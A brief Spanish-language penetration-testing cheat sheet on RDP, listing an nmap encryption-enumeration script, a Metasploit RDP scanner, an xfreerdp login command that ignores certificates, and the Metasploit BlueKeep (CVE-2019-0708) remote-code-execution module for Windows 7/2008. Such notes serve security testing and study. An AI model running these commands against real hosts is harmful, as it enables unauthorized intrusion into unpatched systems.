Enumeración

nmap -p 3389 --script rdp-enum-encryption <IP>
use auxiliary/scanner/rdp/rdp_scanner

Conexión

xfreerdp /u:<user> /p:<pass> /v:<IP> /cert:ignore

BlueKeep (CVE-2019-0708)

RCE crítico en Win7/2008.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Categories:

Updated: